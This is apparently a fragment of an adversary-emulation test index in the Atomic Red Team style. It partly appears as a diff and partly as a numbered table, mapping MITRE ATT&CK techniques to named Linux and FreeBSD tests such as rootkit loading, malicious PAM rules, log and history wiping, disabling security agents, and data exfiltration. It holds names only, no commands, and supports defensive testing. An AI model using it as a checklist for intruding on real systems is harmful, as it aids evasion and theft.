execution,T1053.002,Scheduled Task/Job: At,3,At - Schedule a job freebsd,549863fb-1c91-467e-97fc-1fa32b9f356b,sh
initial-access,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
initial-access,T1078.003,Valid Accounts: Local Accounts,9,Create local account (FreeBSD),95158cc9-8f6d-4889-9531-9be3f7f095e0,sh
initial-access,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
initial-access,T1078.003,Valid Accounts: Local Accounts,11,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
initial-access,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
initial-access,T1078.003,Valid Accounts: Local Accounts,13,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,2,"Exfiltrate data HTTPS using curl freebsd,linux or macos",4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01,bash
exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh
exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Alternative Protocol - SSH,7c3cb337-35ae-4d06-bf03-3032ed2ec268,sh
@@ -335,3 +449,4 @@ exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c5
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,1,Exfiltration Over Alternative Protocol - HTTP,1d1abbd6-a3d3-4b2e-bef5-c59293f46eff,manual
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,3,Exfiltration Over Alternative Protocol - DNS,c403b5a4-b5fc-49f2-b181-d1c80d27db45,manual
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,8,Python3 http.server,3ea1f938-f80a-4305-9aa8-431bc4867313,sh
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,9,Python3 http.server (freebsd),57a303a2-0bc6-400d-b144-4f3292920a0b,sh
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
2 defense-evasion T1556.003 Modify Authentication Process: Pluggable Authentication Modules 1 Malicious PAM rule 4b9dde80-ae22-44b1-a82a-644bf009eb9c sh
3 defense-evasion T1556.003 Modify Authentication Process: Pluggable Authentication Modules 2 Malicious PAM rule (freebsd) b17eacac-282d-4ca8-a240-46602cf863e3 sh
4 defense-evasion T1556.003 Modify Authentication Process: Pluggable Authentication Modules 3 Malicious PAM module 65208808-3125-4a2e-8389-a0a00e9ab326 sh
5 defense-evasion T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification 1 chmod - Change file or folder mode (numeric mode) 34ca1464-de9d-40c6-8c77-690adf36a135 sh
6 defense-evasion T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification 2 chmod - Change file or folder mode (symbolic mode) fc9d6695-d022-4a80-91b1-381f5c35aff3 sh
11 defense-evasion T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification 7 chown - Change file or folder mode ownership only 967ba79d-f184-4e0e-8d09-6362b3162e99 sh
12 defense-evasion T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification 8 chown - Change file or folder ownership recursively 3b015515-b3d8-44e9-b8cd-6fa84faf30b2 bash
13 defense-evasion T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification 9 chattr - Remove immutable file attribute e7469fe2-ad41-4382-8965-99b94dd3c13f sh
14 defense-evasion T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification 10 chflags - Remove immutable file attribute 60eee3ea-2ebd-453b-a666-c52ce08d2709 sh
15 defense-evasion T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification 11 Chmod through c script 973631cf-6680-4ffa-a053-045e1b6b67ab sh
16 defense-evasion T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification 12 Chmod through c script (freebsd) da40b5fe-3098-4b3b-a410-ff177e49ee2e sh
17 defense-evasion T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification 13 Chown through c script 18592ba1-5f88-4e3c-abc8-ab1c6042e389 sh
18 defense-evasion T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification 14 Chown through c script (freebsd) eb577a19-b730-4918-9b03-c5edcf51dc4e sh
19 defense-evasion T1014 Rootkit 1 Loadable Kernel Module based Rootkit dfb50072-e45a-4c75-a17e-a484809c8553 sh
20 defense-evasion T1014 Rootkit 2 Loadable Kernel Module based Rootkit 75483ef8-f10f-444a-bf02-62eb0e48db6f sh
21 defense-evasion T1014 Rootkit 3 dynamic-linker based rootkit (libprocesshider) 1338bf0c-fd0c-48c0-9e65-329f18e2c0d3 sh
22 defense-evasion T1014 Rootkit 4 Loadable Kernel Module based Rootkit (Diamorphine) 0b996469-48c6-46e2-8155-a17f8b6c2247 sh
23 defense-evasion T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 Sudo usage 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e sh
24 defense-evasion T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 2 Sudo usage (freebsd) 2bf9a018-4664-438a-b435-cc6f8c6f71b1 sh
25 defense-evasion T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 3 Unlimited sudo cache timeout a7b17659-dd5e-46f7-b7d1-e6792c91d0bc sh
26 defense-evasion T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 4 Unlimited sudo cache timeout (freebsd) a83ad6e8-6f24-4d7f-8f44-75f8ab742991 sh
27 defense-evasion T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 5 Disable tty_tickets for sudo caching 91a60b03-fb75-4d24-a42e-2eb8956e8de1 sh
28 defense-evasion T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 6 Disable tty_tickets for sudo caching (freebsd) 4df6a0fe-2bdd-4be8-8618-a6a19654a57a sh
29 defense-evasion T1036.005 Masquerading: Match Legitimate Name or Location 1 Execute a process from a directory masquerading as the current parent directory. 812c3ab8-94b0-4698-a9bf-9420af23ce24 sh
30 defense-evasion T1497.001 Virtualization/Sandbox Evasion: System Checks 1 Detect Virtualization Environment (Linux) dfbd1a21-540d-4574-9731-e852bd6fe840 sh
31 defense-evasion T1497.001 Virtualization/Sandbox Evasion: System Checks 2 Detect Virtualization Environment (FreeBSD) e129d73b-3e03-4ae9-bf1e-67fc8921e0fd sh
32 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 1 rm -rf 989cc1b1-3642-4260-a809-54f9dd559683 sh
33 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 2 rm -rf bd8ccc45-d632-481e-b7cf-c467627d68f9 sh
34 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 5 Truncate system log files via truncate utility (freebsd) 14033063-ee04-4eaf-8f5d-ba07ca7a097c sh
35 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 7 Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd) 369878c6-fb04-48d6-8fc2-da9d97b3e054 sh
36 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 10 Overwrite FreeBSD system log via echo utility 11cb8ee1-97fb-4960-8587-69b8388ee9d9 sh
37 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 13 Delete system log files via unlink utility (freebsd) 45ad4abd-19bd-4c5f-a687-41f3eee8d8c2 sh
38 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 18 Delete system journal logs via rm and journalctl utilities ca50dd85-81ff-48ca-92e1-61f119cb1dcf sh
39 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 19 Overwrite Linux Mail Spool 1602ff76-ed7f-4c94-b550-2f727b4782d4 bash
40 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 20 Overwrite Linux Log d304b2dc-90b4-4465-a650-16ddd503f7b5 bash
41 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 1 Clear Bash history (rm) a934276e-2be5-4a36-93fd-98adbb5bd4fc sh
42 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 2 Clear sh history (rm) 448893f8-1d5d-4ae2-9017-7fcd73a7e100 sh
43 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 3 Clear Bash history (echo) cbf506a5-dd78-43e5-be7e-a46b7c7a0a11 sh
44 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 4 Clear sh history (echo) a4d63cb3-9ed9-4837-9480-5bf6b09a6c96 sh
45 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 5 Clear Bash history (cat dev/null) b1251c35-dcd3-4ea1-86da-36d27b54f31f sh
46 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 6 Clear sh history (cat dev/null) ecaefd53-6fa4-4781-ba51-d9d6fb94dbdc sh
47 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 7 Clear Bash history (ln dev/null) 23d348f3-cc5c-4ba9-bd0a-ae09069f0914 sh
48 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 8 Clear sh history (ln dev/null) 3126aa7a-8768-456f-ae05-6ab2d4accfdd sh
49 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 9 Clear Bash history (truncate) 47966a1d-df4f-4078-af65-db6d9aa20739 sh
50 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 10 Clear sh history (truncate) e14d9bb0-c853-4503-aa89-739d5c0a5818 sh
51 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 11 Clear history of a bunch of shells 7e6721df-5f08-4370-9255-f06d8a77af4c sh
52 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 12 Clear history of a bunch of shells (freebsd) 9bf7c8af-5e12-42ea-bf6b-b0348fb9dfb0 sh
53 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 13 Clear and Disable Bash History Logging 784e4011-bd1a-4ecd-a63a-8feb278512e6 sh
54 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 14 Use Space Before Command to Avoid Logging to History 53b03a54-4529-4992-852d-a00b4b7215a6 sh
55 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 15 Disable Bash History Logging with SSH -T 5f8abd62-f615-43c5-b6be-f780f25790a1 sh
56 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 16 Disable sh History Logging with SSH -T (freebsd) ec3f2306-dd19-4c4b-bed7-92d20e9b1dee sh
57 defense-evasion T1140 Deobfuscate/Decode Files or Information 3 Base64 decoding with Python 356dc0e8-684f-4428-bb94-9313998ad608 sh
58 defense-evasion T1140 Deobfuscate/Decode Files or Information 4 Base64 decoding with Perl 6604d964-b9f6-4d4b-8ce8-499829a14d0a sh
59 defense-evasion T1140 Deobfuscate/Decode Files or Information 5 Base64 decoding with shell utilities b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e sh
60 defense-evasion T1140 Deobfuscate/Decode Files or Information 6 Base64 decoding with shell utilities (freebsd) b6097712-c42e-4174-b8f2-4b1e1a5bbb3d sh
61 defense-evasion T1140 Deobfuscate/Decode Files or Information 7 FreeBSD b64encode Shebang in CLI 18ee2002-66e8-4518-87c5-c0ec9c8299ac sh
62 defense-evasion T1140 Deobfuscate/Decode Files or Information 8 Hex decoding with shell utilities 005943f9-8dd5-4349-8b46-0313c0a9f973 sh
63 defense-evasion T1140 Deobfuscate/Decode Files or Information 9 Linux Base64 Encoded Shebang in CLI 3a15c372-67c1-4430-ac8e-ec06d641ce4d sh
64 defense-evasion T1140 Deobfuscate/Decode Files or Information 10 XOR decoding and command execution using Python c3b65cd5-ee51-4e98-b6a3-6cbdec138efc bash
71 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 3 Set a file's creation timestamp 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b sh
72 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 4 Modify file timestamps using reference file 631ea661-d661-44b0-abdb-7a7f3fc08e50 sh
73 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 7 Stop/Start UFW firewall fe135572-edcd-49a2-afe6-1d39521c5a9a sh
74 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 8 Stop/Start Packet Filter 0ca82ed1-0a94-4774-9a9a-a2c83a8022b7 sh
75 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 9 Stop/Start UFW firewall systemctl 9fd99609-1854-4f3c-b47b-97d9a5972bd1 sh
76 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 10 Turn off UFW logging 8a95b832-2c2a-494d-9cb0-dc9dd97c8bad sh
77 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 11 Add and delete UFW firewall rules b2563a4e-c4b8-429c-8d47-d5bcb227ba7a sh
78 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 12 Add and delete Packet Filter rules 8b23cae1-66c1-41c5-b79d-e095b6098b5b sh
79 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 13 Edit UFW firewall user.rules file beaf815a-c883-4194-97e9-fdbbb2bbdd7c sh
80 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 14 Edit UFW firewall ufw.conf file c1d8c4eb-88da-4927-ae97-c7c25893803b sh
81 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 15 Edit UFW firewall sysctl.conf file c4ae0701-88d3-4cd8-8bce-4801ed9f97e4 sh
88 defense-evasion T1574.006 Hijack Execution Flow: LD_PRELOAD 1 Shared Library Injection via /etc/ld.so.preload 39cb0e67-dd0d-4b74-a74b-c072db7ae991 bash
89 defense-evasion T1574.006 Hijack Execution Flow: LD_PRELOAD 2 Shared Library Injection via LD_PRELOAD bc219ff7-789f-4d51-9142-ecae3397deae bash
90 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 1 Make and modify binary from C source 896dfe97-ae43-4101-8e96-9a7996555d80 sh
91 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 2 Make and modify binary from C source (freebsd) dd580455-d84b-481b-b8b0-ac96f3b1dc4c sh
92 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 3 Set a SetUID flag on file 759055b3-3885-4582-a8ec-c00c9d64dd79 sh
93 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 4 Set a SetUID flag on file (freebsd) 9be9b827-ff47-4e1b-bef8-217db6fb7283 sh
94 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 5 Set a SetGID flag on file db55f666-7cba-46c6-9fe6-205a05c3242c sh
95 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 6 Set a SetGID flag on file (freebsd) 1f73af33-62a8-4bf1-bd10-3bea931f2c0d sh
96 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 7 Make and modify capabilities of a binary db53959c-207d-4000-9e7a-cd8eb417e072 sh
97 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 8 Provide the SetUID capability to a file 1ac3272f-9bcf-443a-9888-4b1d3de785c1 sh
98 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 9 Do reconnaissance for files that have the setuid bit set 8e36da01-cd29-45fd-be72-8a0fcaad4481 sh
99 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 10 Do reconnaissance for files that have the setgid bit set 3fb46e17-f337-4c14-9f9a-a471946533e2 sh
100 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 1 Auditing Configuration Changes on Linux Host 212cfbcf-4770-4980-bc21-303e37abd0e3 bash
101 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 2 Auditing Configuration Changes on FreeBSD Host cedaf7e7-28ee-42ab-ba13-456abd35d1bd sh
102 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 3 Logging Configuration Changes on Linux Host 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c bash
103 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 4 Logging Configuration Changes on FreeBSD Host 6b8ca3ab-5980-4321-80c3-bcd77c8daed8 sh
104 defense-evasion T1036.004 Masquerading: Masquerade Task or Service 3 linux rename /proc/pid/comm using prctl f0e3aaea-5cd9-4db6-a077-631dd19b27a8 sh
105 defense-evasion T1562.003 Impair Defenses: HISTCONTROL 1 Disable history collection 4eafdb45-0f79-4d66-aa86-a3e2c08791f5 sh
106 defense-evasion T1562.003 Impair Defenses: HISTCONTROL 2 Disable history collection (freebsd) cada55b4-8251-4c60-819e-8ec1b33c9306 sh
107 defense-evasion T1562.003 Impair Defenses: HISTCONTROL 3 Mac HISTCONTROL 468566d5-83e5-40c1-b338-511e1659628d manual
108 defense-evasion T1562.003 Impair Defenses: HISTCONTROL 4 Clear bash history 878794f7-c511-4199-a950-8c28b3ed8e5b bash
109 defense-evasion T1562.003 Impair Defenses: HISTCONTROL 5 Setting the HISTCONTROL environment variable 10ab786a-028e-4465-96f6-9e83ca6c5f24 bash
110 defense-evasion T1562.003 Impair Defenses: HISTCONTROL 6 Setting the HISTFILESIZE environment variable 5cafd6c1-2f43-46eb-ac47-a5301ba0a618 bash
111 defense-evasion T1562.003 Impair Defenses: HISTCONTROL 7 Setting the HISTSIZE environment variable 386d3850-2ce7-4508-b56b-c0558922c814 sh
112 defense-evasion T1562.003 Impair Defenses: HISTCONTROL 8 Setting the HISTFILE environment variable b3dacb6c-a9e3-44ec-bf87-38db60c5cad1 bash
113 defense-evasion T1562.003 Impair Defenses: HISTCONTROL 9 Setting the HISTFILE environment variable (freebsd) f7308845-6da8-468e-99f2-4271f2f5bb67 sh
114 defense-evasion T1562.003 Impair Defenses: HISTCONTROL 10 Setting the HISTIGNORE environment variable f12acddb-7502-4ce6-a146-5b62c59592f1 bash
115 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 1 Disable syslog 4ce786f8-e601-44b5-bfae-9ebb15a7d1c8 sh
116 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 2 Disable syslog (freebsd) db9de996-441e-4ae0-947b-61b6871e2fdf sh
117 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 3 Disable Cb Response ae8943f7-0f8d-44de-962d-fbc2e2f03eb8 sh
118 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 4 Disable SELinux fc225f36-9279-4c39-b3f9-5141ab74f8d8 sh
119 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 5 Stop Crowdstrike Falcon on Linux 828a1278-81cc-4802-96ab-188bf29ca77d sh
124 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 43 Disable Memory Swap e74e4c63-6fde-4ad2-9ee8-21c3a1733114 sh
125 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 47 Tamper with Defender ATP on Linux/MacOS 40074085-dbc8-492b-90a3-11bcfc52fda8 sh
126 defense-evasion T1027 Obfuscated Files or Information 1 Decode base64 Data into Script f45df6be-2e1e-4136-a384-8f18ab3826fb sh
127 defense-evasion T1027 Obfuscated Files or Information 2 Decode base64 Data into Script 197ed693-08e6-4958-bfd8-5974e291be6c sh
128 defense-evasion T1036.003 Masquerading: Rename System Utilities 2 Masquerading as FreeBSD or Linux crond process. a315bfff-7a98-403b-b442-2ea1b255e556 sh
129 defense-evasion T1553.004 Subvert Trust Controls: Install Root Certificate 1 Install root CA on CentOS/RHEL 9c096ec4-fd42-419d-a762-d64cc950627e sh
130 defense-evasion T1553.004 Subvert Trust Controls: Install Root Certificate 2 Install root CA on FreeBSD f4568003-1438-44ab-a234-b3252ea7e7a3 sh
131 defense-evasion T1553.004 Subvert Trust Controls: Install Root Certificate 3 Install root CA on Debian/Ubuntu 53bcf8a0-1549-4b85-b919-010c56d724ff sh
132 defense-evasion T1027.004 Obfuscated Files or Information: Compile After Delivery 3 C compile d0377aa6-850a-42b2-95f0-de558d80be57 sh
133 defense-evasion T1027.004 Obfuscated Files or Information: Compile After Delivery 4 CC compile da97bb11-d6d0-4fc1-b445-e443d1346efe sh
136 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 2 Delete an entire folder - FreeBSD/Linux/macOS a415f17e-ce8d-4ce2-a8b4-83b674e7017e sh
137 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 3 Overwrite and delete a file with shred 039b4b10-2900-404b-b67f-4b6d49aa6499 sh
138 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 8 Delete Filesystem - Linux f3aa95fe-4f10-4485-ad26-abf22a764c52 bash
139 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 9 Delete Filesystem - FreeBSD b5aaca7e-a48f-4f1b-8f0f-a27b8f516608 sh
140 defense-evasion T1027.002 Obfuscated Files or Information: Software Packing 1 Binary simply packed by UPX (linux) 11c46cd8-e471-450e-acb8-52a1216ae6a4 sh
141 defense-evasion T1027.002 Obfuscated Files or Information: Software Packing 2 Binary packed by UPX, with modified headers (linux) f06197f8-ff46-48c2-a0c6-afc1b50665e1 sh
142 defense-evasion T1036.006 Masquerading: Space after Filename 2 Space After Filename b95ce2eb-a093-4cd8-938d-5258cef656ea bash
143 defense-evasion T1036.006 Masquerading: Space after Filename 3 Space After Filename (FreeBSD) cfc1fbb5-caae-4f4c-bfa8-1b7c8b5cc4e8 sh
144 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 1 Create a hidden file in a hidden directory 61a782e5-9a19-40b5-8ba4-69a4b9f3d7be sh
145 defense-evasion T1078.003 Valid Accounts: Local Accounts 8 Create local account (Linux) 02a91c34-8a5b-4bed-87af-501103eb5357 bash
146 defense-evasion T1078.003 Valid Accounts: Local Accounts 9 Create local account (FreeBSD) 95158cc9-8f6d-4889-9531-9be3f7f095e0 sh
147 defense-evasion T1078.003 Valid Accounts: Local Accounts 10 Reactivate a locked/expired account (Linux) d2b95631-62d7-45a3-aaef-0972cea97931 bash
148 defense-evasion T1078.003 Valid Accounts: Local Accounts 11 Reactivate a locked/expired account (FreeBSD) 09e3380a-fae5-4255-8b19-9950be0252cf sh
149 defense-evasion T1078.003 Valid Accounts: Local Accounts 12 Login as nobody (Linux) 3d2cd093-ee05-41bd-a802-59ee5c301b85 bash
150 defense-evasion T1078.003 Valid Accounts: Local Accounts 13 Login as nobody (freebsd) 16f6374f-7600-459a-9b16-6a88fd96d310 sh
151 persistence T1556.003 Modify Authentication Process: Pluggable Authentication Modules 1 Malicious PAM rule 4b9dde80-ae22-44b1-a82a-644bf009eb9c sh
152 persistence T1556.003 Modify Authentication Process: Pluggable Authentication Modules 2 Malicious PAM rule (freebsd) b17eacac-282d-4ca8-a240-46602cf863e3 sh
153 persistence T1556.003 Modify Authentication Process: Pluggable Authentication Modules 3 Malicious PAM module 65208808-3125-4a2e-8389-a0a00e9ab326 sh
154 persistence T1053.003 Scheduled Task/Job: Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 sh
155 persistence T1053.003 Scheduled Task/Job: Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
156 persistence T1053.003 Scheduled Task/Job: Cron 3 Cron - Add script to /etc/cron.d folder 078e69eb-d9fb-450e-b9d0-2e118217c846 sh
157 persistence T1053.003 Scheduled Task/Job: Cron 4 Cron - Add script to /var/spool/cron/crontabs/ folder 2d943c18-e74a-44bf-936f-25ade6cccab4 bash
158 persistence T1176 Browser Extensions 1 Chrome/Chromium (Developer Mode) 3ecd790d-2617-4abf-9a8c-4e8d47da9ee1 manual
159 persistence T1176 Browser Extensions 2 Chrome/Chromium (Chrome Web Store) 4c83940d-8ca5-4bb2-8100-f46dc914bc3f manual
160 persistence T1176 Browser Extensions 3 Firefox cb790029-17e6-4c43-b96f-002ce5f10938 manual
161 persistence T1546.005 Event Triggered Execution: Trap 1 Trap EXIT a74b2e07-5952-4c03-8b56-56274b076b61 sh
162 persistence T1546.005 Event Triggered Execution: Trap 2 Trap EXIT (freebsd) be1a5d70-6865-44aa-ab50-42244c9fd16f sh
163 persistence T1546.005 Event Triggered Execution: Trap 3 Trap SIGINT a547d1ba-1d7a-4cc5-a9cb-8d65e8809636 sh
164 persistence T1546.005 Event Triggered Execution: Trap 4 Trap SIGINT (freebsd) ade10242-1eac-43df-8412-be0d4c704ada sh
165 persistence T1574.006 Hijack Execution Flow: LD_PRELOAD 1 Shared Library Injection via /etc/ld.so.preload 39cb0e67-dd0d-4b74-a74b-c072db7ae991 bash
166 persistence T1574.006 Hijack Execution Flow: LD_PRELOAD 2 Shared Library Injection via LD_PRELOAD bc219ff7-789f-4d51-9142-ecae3397deae bash
167 persistence T1136.001 Create Account: Local Account 1 Create a user account on a Linux system 40d8eabd-e394-46f6-8785-b9bfa1d011d2 bash
168 persistence T1136.001 Create Account: Local Account 2 Create a user account on a FreeBSD system a39ee1bc-b8c1-4331-8e5f-1859eb408518 sh
169 persistence T1136.001 Create Account: Local Account 6 Create a new user in Linux with `root` UID and GID. a1040a30-d28b-4eda-bd99-bb2861a4616c bash
170 persistence T1136.001 Create Account: Local Account 7 Create a new user in FreeBSD with `root` GID. d141afeb-d2bc-4934-8dd5-b7dba0f9f67a sh
171 persistence T1098.004 SSH Authorized Keys 1 Modify SSH Authorized Keys 342cc723-127c-4d3a-8292-9c0c6b4ecadc sh
172 persistence T1136.002 Create Account: Domain Account 4 Active Directory Create Admin Account 562aa072-524e-459a-ba2b-91f1afccf5ab sh
173 persistence T1136.002 Create Account: Domain Account 5 Active Directory Create User Account (Non-elevated) 8c992cb3-a46e-4fd5-b005-b1bab185af31 sh
177 persistence T1053.006 Scheduled Task/Job: Systemd Timers 3 Create a system level transient systemd service and timer d3eda496-1fc0-49e9-aff5-3bec5da9fa22 sh
178 persistence T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 1 Add command to .bash_profile 94500ae1-7e31-47e3-886b-c328da46872f sh
179 persistence T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 2 Add command to .bashrc 0a898315-4cfa-4007-bafe-33a4646d115f sh
180 persistence T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 3 Add command to .shrc 41502021-591a-4649-8b6e-83c9192aff53 sh
181 persistence T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 4 Append to the system shell profile 694b3cc8-6a78-4d35-9e74-0123d009e94b sh
182 persistence T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 5 Append commands user shell profile bbdb06bc-bab6-4f5b-8232-ba3fbed51d77 sh
183 persistence T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 6 System shell profile scripts 8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4 sh
184 persistence T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 7 Create/Append to .bash_logout 37ad2f24-7c53-4a50-92da-427a4ad13f58 bash
185 persistence T1037.004 Boot or Logon Initialization Scripts: Rc.common 2 rc.common c33f3d80-5f04-419b-a13a-854d1cbdbf3a bash
186 persistence T1037.004 Boot or Logon Initialization Scripts: Rc.common 3 rc.local 126f71af-e1c9-405c-94ef-26a47b16c102 bash
187 persistence T1037.004 Boot or Logon Initialization Scripts: Rc.common 4 rc.local (FreeBSD) 2015fb48-8ab6-4fbf-928b-0b62de5c9476 sh
188 persistence T1543.002 Create or Modify System Process: SysV/Systemd Service 1 Create Systemd Service d9e4f24f-aa67-4c6e-bcbf-85622b697a7c bash
189 persistence T1543.002 Create or Modify System Process: SysV/Systemd Service 2 Create SysV Service 760fe8d2-79d9-494f-905e-a239a3df86f6 sh
190 persistence T1543.002 Create or Modify System Process: SysV/Systemd Service 3 Create Systemd Service file, Enable the service , Modify and Reload the service. c35ac4a8-19de-43af-b9f8-755da7e89c89 bash
191 persistence T1053.002 Scheduled Task/Job: At 2 At - Schedule a job 7266d898-ac82-4ec0-97c7-436075d0d08e sh
192 persistence T1053.002 Scheduled Task/Job: At 3 At - Schedule a job freebsd 549863fb-1c91-467e-97fc-1fa32b9f356b sh
193 persistence T1078.003 Valid Accounts: Local Accounts 8 Create local account (Linux) 02a91c34-8a5b-4bed-87af-501103eb5357 bash
194 persistence T1078.003 Valid Accounts: Local Accounts 9 Create local account (FreeBSD) 95158cc9-8f6d-4889-9531-9be3f7f095e0 sh
195 persistence T1078.003 Valid Accounts: Local Accounts 10 Reactivate a locked/expired account (Linux) d2b95631-62d7-45a3-aaef-0972cea97931 bash
196 persistence T1078.003 Valid Accounts: Local Accounts 11 Reactivate a locked/expired account (FreeBSD) 09e3380a-fae5-4255-8b19-9950be0252cf sh
197 persistence T1078.003 Valid Accounts: Local Accounts 12 Login as nobody (Linux) 3d2cd093-ee05-41bd-a802-59ee5c301b85 bash
